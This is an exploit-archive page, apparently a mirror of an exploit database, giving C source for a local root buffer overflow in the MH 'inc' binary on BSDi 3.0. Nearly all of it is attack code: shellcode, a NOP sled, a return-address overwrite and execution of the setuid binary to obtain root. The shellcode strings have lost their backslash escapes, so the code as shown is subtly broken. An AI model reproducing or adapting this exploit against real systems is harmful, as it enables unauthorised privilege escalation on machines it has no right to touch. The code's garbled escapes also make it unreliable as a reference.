[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : BSDi 3.0 inc Local Root Buffer Overflow Exploit
# Published : 2000-11-30
# Author : vade79
# Previous Title : GLIBC (via /bin/su) Local Root Exploit
# Next Title : Solaris locale Format Strings (noexec stack) Exploit


/*
   (BSDi)inc[mh] buffer overflow, by v9[v9@fakehalo.org].
   this is will give you euid=0(root) on BSDi/3.0 systems.
*/

#define PATH		"/usr/contrib/mh/bin/inc"  /* path to inc on BSDi/3.0 */
#define BUFFER		2048                       /* no need to change this. */
#define DEFAULT_OFFSET	-7000                      /* generalized offset.     */

static char exec[]=
 "xebx1fx5ex31xc0x89x46xf5x88x46xfax89x46x0c" /* 14 characters. */
 "x89x76x08x50x8dx5ex08x53x56x56xb0x3bx9axff" /* 14 characters. */
 "xffxffxffx07xffxe8xdcxffxffxffx2fx62x69x6e" /* 14 characters. */
 "x2fx73x68x00";                    /* 4 characters; 46 characters total. */

long pointer(void){__asm__("movl %esp,%eax");}
int main(int argc,char **argv){
  char eip[BUFFER],buf[4096];
  int i,offset;
  long ret;
  printf("[ (BSDi)inc[mh]: buffer overflow, by: v9[v9@fakehalo.org]. ]n");
  if(argc>1){offset=atoi(argv[1]);}
  else{offset=DEFAULT_OFFSET;}
  ret=(pointer()-offset);
  eip[0]=0x01;eip[1]=0x01;eip[2]=0x01;
  for(i=3;i<BUFFER;i+=4){*(long *)&eip[i]=ret;}
  eip[BUFFER]=0x0;
  for(i=0;i<(4096-strlen(exec)-strlen(eip));i++){*(buf+i)=0x90;}
  memcpy(buf+i,exec,strlen(exec));
  memcpy(buf,"EXEC=",5);putenv(buf);
  printf("*** [data]: return address: 0x%lx, offset: %d.n",ret,offset);
  if(execlp(PATH,"inc","-file",eip,0)){
    printf("*** [error]: could not execute %s successfully.n",PATH);
    exit(1);
  }
}


// www.Syue.com [2000-11-30]